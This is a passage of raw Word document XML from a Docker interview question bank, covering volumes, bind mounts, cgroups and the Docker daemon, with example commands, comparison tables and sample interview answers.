        <w:t xml:space="preserve">  --name mysql \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v mysql-data:/var/lib/mysql \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql:8</w:t>
        <w:br/>
        <w:t>Here:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * mysql-data → Docker volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * /var/lib/mysql → Container path</w:t>
        <w:br/>
        <w:t>Database files are stored in the volume.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Volume Lifecycle</w:t>
        <w:br/>
        <w:t>Create Volume</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Attach to Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Container Stops</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Container Deleted</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Volume Still Exists</w:t>
        <w:br/>
        <w:t>Volumes are independent of container lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Docker Storage</w:t>
        <w:br/>
        <w:t>1. Volumes (Recommended)</w:t>
        <w:br/>
        <w:t>-v myvolume:/data</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Managed by Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Best performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy backup and migration</w:t>
        <w:br/>
        <w:t>2. Bind Mounts</w:t>
        <w:br/>
        <w:t>-v /host/data:/data</w:t>
        <w:br/>
        <w:t>Maps a host directory directly into the container.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Host: /app/logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container: /logs</w:t>
        <w:br/>
        <w:t>3. tmpfs Mounts</w:t>
        <w:br/>
        <w:t>--tmpfs /data</w:t>
        <w:br/>
        <w:t>Stored only in memory and removed when the container stops.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Compose Example</w:t>
        <w:br/>
        <w:t>version: "3.9"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mysql:8</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - mysql-data:/var/lib/mysql</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql-data:</w:t>
        <w:br/>
        <w:t>Start:</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Use Cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Databases (MySQL, PostgreSQL, MongoDB)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Application logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared data between containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backups</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Persistent configuration files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Volume vs Bind Mount</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bind Mount</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed by Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Performance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Depends on host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Path Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended for Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Usually No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Backup a Volume</w:t>
        <w:br/>
        <w:t>docker run --rm \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v mysql-data:/data \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -v $(pwd):/backup \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ubuntu tar czf /backup/mysql-backup.tar.gz /data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker volumes are persistent storage mechanisms that exist independently of container lifecycles. They are used to retain application data even when containers are stopped, recreated, or deleted. Volumes are managed by Docker, provide better portability and performance than bind mounts, and are commonly used for databases, logs, and shared application data. In production environments, volumes are often backed by network-attached or cloud storage and integrated with orchestration platforms such as Kubernetes through Persistent Volumes and Persistent Volume Claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q354. What are bind mounts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Bind Mounts?</w:t>
        <w:br/>
        <w:t>A bind mount maps a file or directory from the host machine directly into a container.</w:t>
        <w:br/>
        <w:t>This allows the container to access and modify files on the host filesystem.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Host directory:</w:t>
        <w:br/>
        <w:t>/home/akhilesh/app</w:t>
        <w:br/>
        <w:t>Container directory:</w:t>
        <w:br/>
        <w:t>/app</w:t>
        <w:br/>
        <w:t>Run container:</w:t>
        <w:br/>
        <w:t>docker run -v /home/akhilesh/app:/app nginx</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t>Host</w:t>
        <w:br/>
        <w:t>└── /home/akhilesh/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>└── /app</w:t>
        <w:br/>
        <w:t>Any file changes on the host are immediately visible inside the container, and vice versa.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use Cases</w:t>
        <w:br/>
        <w:t>1. Local Development</w:t>
        <w:br/>
        <w:t>docker run -v $(pwd):/app node:20</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Edit code on your laptop.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container sees changes instantly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No need to rebuild the image.</w:t>
        <w:br/>
        <w:t>2. Configuration Files</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /etc/nginx/nginx.conf:/etc/nginx/nginx.conf \</w:t>
        <w:br/>
        <w:t>nginx</w:t>
        <w:br/>
        <w:t>3. Log Sharing</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /var/log/myapp:/logs \</w:t>
        <w:br/>
        <w:t>myapp</w:t>
        <w:br/>
        <w:t>Logs are stored directly on the host.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Read-Only Bind Mount</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t>-v /host/config:/app/config:ro \</w:t>
        <w:br/>
        <w:t>myapp</w:t>
        <w:br/>
        <w:t>ro = Read Only</w:t>
        <w:br/>
        <w:t>The container can read files but cannot modify them.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Bind Mount vs Volume</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Bind Mount</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Volume</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Storage Location</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host filesystem</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker-managed storage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed By</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Portability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Path Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Development Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Excellent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Good</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Use</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Easy access to host files</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Real-time synchronization</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Great for development</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Useful for configs and logs</w:t>
        <w:br/>
        <w:t>Disadvantages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Depends on host directory structure</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Less portable</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Potential security risks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harder to migrate across servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Bind mounts are a Docker storage mechanism that maps a specific file or directory from the host machine into a container. Unlike Docker volumes, bind mounts are managed by the host filesystem and require an explicit host path. They are commonly used in development environments for source code sharing, configuration management, and log collection. While bind mounts offer flexibility and real-time synchronization, they reduce portability and are generally less suitable than Docker volumes for production persistent storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q355. Explain tmpfs mounts.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q356. What is container isolation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q357. Explain namespaces in Linux.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q358. What are cgroups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are cgroups?</w:t>
        <w:br/>
        <w:t>cgroups (Control Groups) are a Linux kernel feature used to limit, prioritize, monitor, and isolate resource usage of processes.</w:t>
        <w:br/>
        <w:t>While namespaces provide isolation, cgroups control how much CPU, memory, disk I/O, and network resources a process or container can consume.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need cgroups?</w:t>
        <w:br/>
        <w:t>Without cgroups:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Uses 90% CPU</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Starved of resources</w:t>
        <w:br/>
        <w:t>One application can consume all system resources.</w:t>
        <w:br/>
        <w:t>With cgroups:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ CPU: 2 cores</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Memory: 2 GB</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ CPU: 1 core</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Memory: 1 GB</w:t>
        <w:br/>
        <w:t>Each container gets controlled resource allocation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Resources Managed by cgroups</w:t>
        <w:br/>
        <w:t>Resource</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit CPU cores/usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit RAM usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Disk I/O</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control read/write rates</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Network</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prioritize network traffic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Processes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit number of processes (PIDs)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Example</w:t>
        <w:br/>
        <w:t>Limit memory:</w:t>
        <w:br/>
        <w:t>docker run -d --memory=512m nginx</w:t>
        <w:br/>
        <w:t>Limit CPU:</w:t>
        <w:br/>
        <w:t>docker run -d --cpus=1 nginx</w:t>
        <w:br/>
        <w:t>Limit both:</w:t>
        <w:br/>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --memory=1g \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cpus=2 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How cgroups Work</w:t>
        <w:br/>
        <w:t>Host OS</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼</w:t>
        <w:br/>
        <w:t>cgroups</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌─┴─────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼           ▼</w:t>
        <w:br/>
        <w:t>Container A  Container B</w:t>
        <w:br/>
        <w:t>The kernel enforces resource limits for each group of processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common cgroup Controllers</w:t>
        <w:br/>
        <w:t>CPU Controller</w:t>
        <w:br/>
        <w:t>CPU shares</w:t>
        <w:br/>
        <w:t>CPU quota</w:t>
        <w:br/>
        <w:t>CPU affinity</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run --cpus=2 nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Memory Controller</w:t>
        <w:br/>
        <w:t>Memory limits</w:t>
        <w:br/>
        <w:t>OOM handling</w:t>
        <w:br/>
        <w:t>Swap limits</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker run --memory=1g nginx</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>PID Controller</w:t>
        <w:br/>
        <w:t>Limits the number of processes.</w:t>
        <w:br/>
        <w:t>docker run --pids-limit=100 nginx</w:t>
        <w:br/>
        <w:t>Prevents fork bombs and runaway processes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Block I/O Controller</w:t>
        <w:br/>
        <w:t>Controls disk throughput.</w:t>
        <w:br/>
        <w:t>Read Rate</w:t>
        <w:br/>
        <w:t>Write Rate</w:t>
        <w:br/>
        <w:t>IO Priority</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes and cgroups</w:t>
        <w:br/>
        <w:t>Pod resource requests and limits are enforced through cgroups.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "512Mi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "500m"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: "1Gi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "1"</w:t>
        <w:br/>
        <w:t>Kubernetes configures cgroups on the node to enforce these limits.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Namespaces vs cgroups</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespaces</w:t>
        <w:br/>
        <w:tab/>
        <w:t>cgroups</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Question Answered</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“What can I see?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“How much can I use?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate network stack</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit RAM to 1 GB</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Containers rely on both:</w:t>
        <w:br/>
        <w:t>Namespaces → Isolation</w:t>
        <w:br/>
        <w:t>cgroups    → Resource Limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>cgroups v1 vs v2</w:t>
        <w:br/>
        <w:t>cgroups v1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>cgroups v2</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multiple hierarchies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unified hierarchy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simpler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Older systems</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Modern Linux distributions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less consistent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better resource management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Most modern Kubernetes distributions use cgroups v2.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>cgroups, or Control Groups, are a Linux kernel feature that manages and limits resource consumption for groups of processes. They enable containers to have controlled access to CPU, memory, disk I/O, network bandwidth, and process counts. While namespaces provide isolation, cgroups enforce resource governance and prevent noisy-neighbor issues. Docker and Kubernetes rely heavily on cgroups to implement resource requests, limits, and quality-of-service policies. Together, namespaces and cgroups form the foundation of container runtime isolation and resource management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q359. Explain container security.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q360. What is rootless Docker?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q361. Explain image scanning.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q362. What is Trivy?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q363. Explain Docker Swarm.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q364. What is Podman?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q365. Explain container lifecycle.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q366. What is image immutability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q367. Explain distroless images.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q368. What are slim images?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q369. Explain image optimization.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q370. What is ENTRYPOINT?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q371. Explain CMD in Docker.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q372. Difference between CMD and ENTRYPOINT?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q373. Explain COPY vs ADD.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q374. What is .dockerignore?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q375. Explain build cache.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q376. What is docker exec?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q377. Explain docker inspect.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q378. What is container logging?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q379. Explain logging drivers.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q380. What is sidecar logging?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q381. Explain health checks in Docker.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q382. What is Docker daemon?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Daemon?</w:t>
        <w:br/>
        <w:t>The Docker Daemon (dockerd) is the background service that manages Docker objects such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Networks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Volumes</w:t>
        <w:br/>
        <w:t>It is the core component of the Docker Engine and is responsible for building, running, and managing containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Architecture</w:t>
        <w:br/>
        <w:t>+----------------+</w:t>
        <w:br/>
        <w:t>| Docker Client  |</w:t>
        <w:br/>
        <w:t>| (docker CLI)   |</w:t>
        <w:br/>
        <w:t>+--------+-------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">         | REST API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         ▼</w:t>
        <w:br/>
        <w:t>+----------------+</w:t>
        <w:br/>
        <w:t>| Docker Daemon  |</w:t>
        <w:br/>
        <w:t>|   (dockerd)    |</w:t>
        <w:br/>
        <w:t>+--------+-------+</w:t>
        <w:br/>
        <w:t xml:space="preserve">         |</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌───────┼────────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼       ▼        ▼</w:t>
        <w:br/>
        <w:t>Images Containers Networks</w:t>
        <w:br/>
        <w:t>When you run a Docker command, the CLI communicates with the Docker daemon, which performs the actual work.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Command:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Docker Daemon</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Pull Image (if needed)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Create Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Start Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Responsibilities of Docker Daemon</w:t>
        <w:br/>
        <w:t>1. Container Management</w:t>
        <w:br/>
        <w:t>docker run</w:t>
        <w:br/>
        <w:t>docker stop</w:t>
        <w:br/>
        <w:t>docker restart</w:t>
        <w:br/>
        <w:t>docker rm</w:t>
        <w:br/>
        <w:t>Creates, starts, stops, and removes containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Image Management</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t>docker build</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t>Manages image lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Network Management</w:t>
        <w:br/>
